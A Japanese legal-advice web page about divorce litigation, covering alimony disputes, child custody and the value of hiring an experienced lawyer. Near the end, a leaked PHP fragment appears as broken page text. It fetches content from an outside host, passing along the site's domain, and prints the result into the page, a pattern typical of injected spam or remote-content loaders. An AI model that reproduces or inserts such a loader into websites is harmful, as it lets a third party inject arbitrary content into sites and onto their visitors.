前へ
次へ

離婚裁判に行きつくまでの過程

離婚裁判するまでの流れは夫婦の話し合いの協議離婚で、解決しなかった場合は離婚調停の場で話し合います。

more

離婚裁判時に弁護士に相談するメリット

離婚裁判とは、慰謝料、財産分与・子供の親権などを争いますが、確定判決が出てしまった場合、納得できない

more

離婚において多くの人が離婚裁判をしているのか

テレビや新聞などには裁判のことが出ることがあります。毎日のように全国にある裁判所では何らかの手続きが

more

離婚裁判について知ろう

夫婦間の関係性をなんとか再構築しようと考え、一生懸命手を尽くしてきたけれど、もうこれ以上の改善は望めないという場合は当然あります。そういった際に、いかに自分自身が良い方向性に進めるかという事を、一番に考えるべきです。離婚の手続きとして、離婚届を提出して、そこですべてが終わりというようになれば、非常に簡単ではありますが、人生を共にしている時期が長いとそこにはいろいろな問題が絡んでくることも多いと言えるでしょう。例えばお金です。離婚裁判で取り上げられる問題としては、慰謝料の問題があります。慰謝料を払うかどうかという事から、その金額についてどのぐらいのものとなるのかが争われます。離婚原因が相手にあるというように考えている場合には、慰謝料を請求することはとても重要ですし、かつその金額についてもしっかりと確認をしておきたいところです。話し合いで納得いくものが得られるのであれば、裁判に進むことはないのかもしれませんが、関係がこじれてしまって二人で冷静な話し合いができないという場合には、裁判という手段を利用するころになります。また、子どもがいるという場合にも、親権をどちらが持つのかという事が重要な争点となります。大事な子供の成長にもかかわってくることですので、公平に判断をしてもらうことが必要になります。親戚や友達のアドバイスという事のように、どちらか一方に加担したものではなく、離婚裁判ではお互いの主張をしたうえで、きちんと裁判官が判断を公平に下してくれるという事になります。離婚をするまでには精神的、体力的に非常に困難を極め、疲れ切ってしまったという話もよく聞きます。また知識がなく、どのように裁判が進むか、必要なことは何かというポイントすらもわからないという事もあるでしょう。離婚裁判をとりあつかっている実績のある弁護士に依頼をするという事で、より安心が出来るという事もあります。離婚の相談をしているという弁護士を探してみるのがよいでしょう。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top